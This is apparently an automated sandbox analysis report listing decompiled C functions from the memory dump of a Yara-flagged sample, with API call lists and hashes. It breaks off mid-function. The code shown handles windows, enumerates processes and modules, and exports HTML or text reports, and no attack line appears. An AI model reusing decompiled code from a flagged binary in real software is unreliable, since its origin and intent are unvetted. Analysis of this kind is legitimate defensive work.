                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                              • String ID: rA
                                                                                              • API String ID: 1886237854-474049127
                                                                                              • Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                              • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                                                              • Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                              • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {
                                                                                              
                                                                                              				 *__edi =  *__edi + __ecx;
                                                                                              			}



                                                                                              0x00409e38

                                                                                              APIs
                                                                                                • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                                • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                              • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                              • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                              • SendMessageA.USER32 ref: 00409EBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                              • String ID:
                                                                                              • API String ID: 3673709545-0
                                                                                              • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                              • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                                                              • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                              • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {
                                                                                              
                                                                                              				 *__edi =  *__edi + __ecx;
                                                                                              			}



                                                                                              0x00409e38

                                                                                              APIs
                                                                                                • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                                • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                              • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                              • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                              • SendMessageA.USER32 ref: 00409EBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                              • String ID:
                                                                                              • API String ID: 3673709545-0
                                                                                              • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                              • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                                                              • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                              • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E00407D0A(void* __eflags, struct HWND__* _a4) {
                                                                                              				void _v4103;
                                                                                              				char _v4104;
                                                                                              				void* _t8;
                                                                                              				void* _t17;
                                                                                              
                                                                                              				_t8 = E004118A0(0x1004, _t17);
                                                                                              				_t21 =  *0x4171b8;
                                                                                              				if( *0x4171b8 != 0) {
                                                                                              					_v4104 = 0;
                                                                                              					memset( &_v4103, 0, 0x1000);
                                                                                              					sprintf(0x4172c0, "dialog_%d",  *0x417300);
                                                                                              					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
                                                                                              						SetWindowTextA(_a4,  &_v4104);
                                                                                              					}
                                                                                              					return EnumChildWindows(_a4, E00407CAD, 0);
                                                                                              				}
                                                                                              				return _t8;
                                                                                              			}








                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00407D35
                                                                                              • sprintf.MSVCRT ref: 00407D4A
                                                                                                • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                                                • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                                                • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                                                              • EnumChildWindows.USER32 ref: 00407D81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                              • String ID: caption$dialog_%d
                                                                                              • API String ID: 246480800-4161923789
                                                                                              • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                              • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                                                              • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                              • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 35%
                                                                                              			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
                                                                                              				void* _v8;
                                                                                              				signed int _v12;
                                                                                              				unsigned int _v16;
                                                                                              				int _v20;
                                                                                              				intOrPtr _v28;
                                                                                              				char _v32;
                                                                                              				intOrPtr _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				char _v308;
                                                                                              				intOrPtr _v312;
                                                                                              				void _v316;
                                                                                              				void _v579;
                                                                                              				char _v580;
                                                                                              				char _v844;
                                                                                              				intOrPtr _v1104;
                                                                                              				intOrPtr _v1108;
                                                                                              				intOrPtr _v1112;
                                                                                              				char _v1132;
                                                                                              				char _v17516;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t63;
                                                                                              				void* _t64;
                                                                                              				void* _t77;
                                                                                              				intOrPtr _t84;
                                                                                              				void _t94;
                                                                                              				int _t102;
                                                                                              				void* _t106;
                                                                                              				void* _t107;
                                                                                              
                                                                                              				E004118A0(0x446c, __ecx);
                                                                                              				_t102 = 0;
                                                                                              				_v20 = 0;
                                                                                              				if(E0040629C() == 0 ||  *0x417518 == 0) {
                                                                                              					if( *0x417514 != _t102) {
                                                                                              						_t94 = _a4;
                                                                                              						_t63 =  *0x416fe0(8, _t94);
                                                                                              						_v8 = _t63;
                                                                                              						if(_t63 != 0xffffffff) {
                                                                                              							_v20 = 1;
                                                                                              							_v1132 = 0x224;
                                                                                              							_t64 =  *0x416fd8(_t63,  &_v1132);
                                                                                              							while(_t64 != 0) {
                                                                                              								memset( &_v316, _t102, 0x118);
                                                                                              								_v312 = _v1104;
                                                                                              								_v316 = _t94;
                                                                                              								strcpy( &_v308,  &_v844);
                                                                                              								_v44 = _v1108;
                                                                                              								_t107 = _t107 + 0x14;
                                                                                              								_v40 = _v1112;
                                                                                              								_v1132 = 0x224;
                                                                                              								if(E0040E45F(_a8,  &_v316) != 0) {
                                                                                              									_t64 =  *0x416fd4(_v8,  &_v1132);
                                                                                              									continue;
                                                                                              								}
                                                                                              								goto L18;
                                                                                              							}
                                                                                              							goto L18;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t77 = OpenProcess(0x410, 0, _a4);
                                                                                              					_v8 = _t77;
                                                                                              					if(_t77 != 0) {
                                                                                              						_push( &_v16);
                                                                                              						_push(0x4000);
                                                                                              						_push( &_v17516);
                                                                                              						_push(_t77);
                                                                                              						if( *0x416fe4() != 0) {
                                                                                              							_t6 =  &_v16;
                                                                                              							 *_t6 = _v16 >> 2;
                                                                                              							_v20 = 1;
                                                                                              							_v12 = 0;
                                                                                              							if( *_t6 != 0) {
                                                                                              								while(1) {
                                                                                              									_v580 = 0;
                                                                                              									memset( &_v579, _t102, 0x104);
                                                                                              									memset( &_v316, _t102, 0x118);
                                                                                              									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
                                                                                              									_t107 = _t107 + 0x18;
                                                                                              									_v316 = _a4;
                                                                                              									_v312 = _t84;
                                                                                              									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
                                                                                              									E0040E172( &_v308,  &_v580);
                                                                                              									_push(0xc);
                                                                                              									_push( &_v32);
                                                                                              									_push(_v312);
                                                                                              									_push(_v8);
                                                                                              									if( *0x416fe8() != 0) {
                                                                                              										_v44 = _v28;
                                                                                              										_v40 = _v32;
                                                                                              									}
                                                                                              									if(E0040E45F(_a8,  &_v316) == 0) {
                                                                                              										goto L18;
                                                                                              									}
                                                                                              									_v12 = _v12 + 1;
                                                                                              									if(_v12 < _v16) {
                                                                                              										_t102 = 0;
                                                                                              										continue;
                                                                                              									} else {
                                                                                              									}
                                                                                              									goto L18;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						L18:
                                                                                              						CloseHandle(_v8);
                                                                                              					}
                                                                                              				}
                                                                                              				return _v20;
                                                                                              			}

                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                                                              • memset.MSVCRT ref: 0040E2E9
                                                                                              • memset.MSVCRT ref: 0040E2FB
                                                                                                • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                              • memset.MSVCRT ref: 0040E3E2
                                                                                              • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                                                              • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3799309942-0
                                                                                              • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                              • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                                                              • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                              • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 61%
                                                                                              			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                              				signed int _v8;
                                                                                              				char* _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v24;
                                                                                              				signed int _v28;
                                                                                              				char _v48;
                                                                                              				char _v68;
                                                                                              				void _v96;
                                                                                              				void* __edi;
                                                                                              				signed int _t51;
                                                                                              				char* _t53;
                                                                                              				char* _t63;
                                                                                              				intOrPtr* _t69;
                                                                                              				signed int _t70;
                                                                                              				char _t84;
                                                                                              				intOrPtr* _t91;
                                                                                              				signed int _t95;
                                                                                              				void* _t96;
                                                                                              				void* _t97;
                                                                                              
                                                                                              				_t69 = __ebx;
                                                                                              				_t70 = 6;
                                                                                              				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
                                                                                              				_t97 = _t96 + 0xc;
                                                                                              				asm("movsw");
                                                                                              				asm("movsd");
                                                                                              				asm("movsd");
                                                                                              				asm("movsd");
                                                                                              				asm("movsd");
                                                                                              				asm("movsw");
                                                                                              				asm("movsb");
                                                                                              				E00405EFD(_a4, "<tr>");
                                                                                              				_t95 = 0;
                                                                                              				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
                                                                                              					do {
                                                                                              						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
                                                                                              						_v8 = _t51;
                                                                                              						_t53 =  &_v96;
                                                                                              						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
                                                                                              							_t53 =  &_v48;
                                                                                              						}
                                                                                              						_t91 = _a8;
                                                                                              						_v28 = _v28 | 0xffffffff;
                                                                                              						_v24 = _v24 | 0xffffffff;
                                                                                              						_v20 = _v20 | 0xffffffff;
                                                                                              						_v16 = _v16 & 0x00000000;
                                                                                              						_v12 = _t53;
                                                                                              						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
                                                                                              						E0040F071(_v28,  &_v68);
                                                                                              						E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
                                                                                              						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
                                                                                              						_t63 =  *(_t69 + 0x50);
                                                                                              						_t84 =  *_t63;
                                                                                              						if(_t84 == 0 || _t84 == 0x20) {
                                                                                              							strcat(_t63, "&nbsp;");
                                                                                              						}
                                                                                              						E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
                                                                                              						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
                                                                                              						E00405EFD(_a4,  *(_t69 + 0x4c));
                                                                                              						_t97 = _t97 + 0x20;
                                                                                              						_t95 = _t95 + 1;
                                                                                              					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
                                                                                              				}
                                                                                              				return E00405EFD(_a4, 0x412b1c);
                                                                                              			}

                                                                                              APIs
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              • strcat.MSVCRT(?,&nbsp;), ref: 0040942E
                                                                                              • sprintf.MSVCRT ref: 00409450
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWritesprintfstrcatstrlen
                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                              • API String ID: 3813295786-4153097237
                                                                                              • Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                              • Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
                                                                                              • Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                              • Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 73%
                                                                                              			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
                                                                                              				void* _v8;
                                                                                              				intOrPtr* _v12;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v288;
                                                                                              				intOrPtr _v800;
                                                                                              				char _v1568;
                                                                                              				char _v1824;
                                                                                              				intOrPtr _v1828;
                                                                                              				intOrPtr _v1840;
                                                                                              				intOrPtr _v1844;
                                                                                              				intOrPtr _v2100;
                                                                                              				intOrPtr _v2612;
                                                                                              				char _v3124;
                                                                                              				char _v3636;
                                                                                              				intOrPtr _v3640;
                                                                                              				void* _v5768;
                                                                                              				char _v5796;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				char* _t39;
                                                                                              				intOrPtr _t51;
                                                                                              				int _t60;
                                                                                              				intOrPtr* _t73;
                                                                                              				int _t76;
                                                                                              				void* _t80;
                                                                                              
                                                                                              				_t80 = __eflags;
                                                                                              				E004118A0(0x16a0, __ecx);
                                                                                              				_t39 = wcslen(_a8);
                                                                                              				_t2 =  &(_t39[1]); // 0x1
                                                                                              				_t76 = _t2;
                                                                                              				_push(_t76);
                                                                                              				L004115D0();
                                                                                              				_t60 = 0;
                                                                                              				_v8 = _t39;
                                                                                              				 *_t39 = 0;
                                                                                              				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
                                                                                              				_t77 =  &_v5796;
                                                                                              				E0040FE05( &_v5796, _t80);
                                                                                              				_v5796 = 0x4144ac;
                                                                                              				E004104BC( &_v3636);
                                                                                              				E004104BC( &_v1824);
                                                                                              				_t73 = _a4;
                                                                                              				_v3640 =  *((intOrPtr*)(_t73 + 4));
                                                                                              				_v12 = _t73;
                                                                                              				_a8 = strlen(_v8);
                                                                                              				E0040FF76(_t47, _t77);
                                                                                              				memcpy(_v5768, _v8, _a8);
                                                                                              				E00410081(_t77, _t80);
                                                                                              				_t51 =  *((intOrPtr*)(_t73 + 4));
                                                                                              				_v1840 = _t51;
                                                                                              				_v28 = _t51;
                                                                                              				if(_v2100 != 0 || _v2612 != 0) {
                                                                                              					if(_v1844 != _t60) {
                                                                                              						if(_v1568 != _t60) {
                                                                                              							E004060D0(0xff,  &_v3124,  &_v1568);
                                                                                              							_t73 = _a4;
                                                                                              							_v1828 = _v24;
                                                                                              							_t60 = 0;
                                                                                              						}
                                                                                              						 *((intOrPtr*)( *_t73))( &_v3636);
                                                                                              					}
                                                                                              				}
                                                                                              				if(_v288 != _t60 || _v800 != _t60) {
                                                                                              					if(_v32 != _t60) {
                                                                                              						 *((intOrPtr*)( *_t73))( &_v1824);
                                                                                              					}
                                                                                              				}
                                                                                              				_push(_v8);
                                                                                              				L004115D6();
                                                                                              				return E0040FEED( &_v5796);
                                                                                              			}

                                                                                              APIs
                                                                                              • wcslen.MSVCRT ref: 00410A9D
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                                                              • strlen.MSVCRT ref: 00410B02
                                                                                                • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                                                • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                                                              • memcpy.MSVCRT ref: 00410B1C
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 577244452-0
                                                                                              • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                              • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                                                              • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                              • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				char _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				char* _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				char* _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _v52;
                                                                                              				intOrPtr _v56;
                                                                                              				intOrPtr _v60;
                                                                                              				intOrPtr _v64;
                                                                                              				intOrPtr _v68;
                                                                                              				char _v72;
                                                                                              				void _v1095;
                                                                                              				char _v1096;
                                                                                              				void* __ebx;
                                                                                              				char _t29;
                                                                                              				intOrPtr _t32;
                                                                                              				intOrPtr _t35;
                                                                                              				void* _t39;
                                                                                              				void* _t52;
                                                                                              				char _t59;
                                                                                              				char* _t60;
                                                                                              				intOrPtr _t61;
                                                                                              
                                                                                              				_v1096 = 0;
                                                                                              				memset( &_v1095, 0, 0x3ff);
                                                                                              				_v8 = 0x747874;
                                                                                              				_t29 = E004078FF(0x1f5);
                                                                                              				_t59 = "*.txt";
                                                                                              				_v72 = _t29;
                                                                                              				_v68 = _t59;
                                                                                              				_v64 = E004078FF(0x1f6);
                                                                                              				_v60 = _t59;
                                                                                              				_v56 = E004078FF(0x1f7);
                                                                                              				_v52 = _t59;
                                                                                              				_t32 = E004078FF(0x1f8);
                                                                                              				_t60 = "*.htm;*.html";
                                                                                              				_v48 = _t32;
                                                                                              				_v44 = _t60;
                                                                                              				_v40 = E004078FF(0x1f9);
                                                                                              				_v36 = _t60;
                                                                                              				_v32 = E004078FF(0x1fa);
                                                                                              				_v28 = "*.xml";
                                                                                              				_t35 = E004078FF(0x1fb);
                                                                                              				_t61 = "*.csv";
                                                                                              				_v24 = _t35;
                                                                                              				_v20 = _t61;
                                                                                              				_v16 = E004078FF(0x1fc);
                                                                                              				_v12 = _t61;
                                                                                              				E0040684D( &_v1096,  &_v72, 8);
                                                                                              				_t52 = 7;
                                                                                              				_t39 = E004078FF(_t52);
                                                                                              				_t23 =  &_v8; // 0x747874
                                                                                              				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
                                                                                              			}

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040AB74
                                                                                                • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                                                                • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                                                                • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                                                                • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
                                                                                                • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                                                                • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                                                                • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                                                                • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                              • API String ID: 4021364944-3614832568
                                                                                              • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                              • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                                                              • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                              • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E00406491(void* __edx, struct HWND__* _a4) {
                                                                                              				int _v8;
                                                                                              				struct tagRECT _v24;
                                                                                              				int _t17;
                                                                                              				void* _t36;
                                                                                              				struct HDC__* _t38;
                                                                                              
                                                                                              				_t36 = __edx;
                                                                                              				_t38 = GetDC(0);
                                                                                              				_t17 = GetDeviceCaps(_t38, 8);
                                                                                              				_v8 = GetDeviceCaps(_t38, 0xa);
                                                                                              				ReleaseDC(0, _t38);
                                                                                              				GetWindowRect(_a4,  &_v24);
                                                                                              				asm("cdq");
                                                                                              				asm("cdq");
                                                                                              				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
                                                                                              			}









                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0040649C
                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                                                              • ReleaseDC.USER32 ref: 004064BC
                                                                                              • GetWindowRect.USER32 ref: 004064C9
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CapsDeviceWindow$MoveRectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 3197862061-0
                                                                                              • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                              • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                                                              • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                              • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
                                                                                              				long _v8;
                                                                                              				void _v8199;
                                                                                              				char _v8200;
                                                                                              				void _v24582;
                                                                                              				short _v24584;
                                                                                              
                                                                                              				E004118A0(0x6004, __ecx);
                                                                                              				_v24584 = 0;
                                                                                              				memset( &_v24582, 0, 0x3ffe);
                                                                                              				_v8200 = 0;
                                                                                              				memset( &_v8199, 0, 0x1fff);
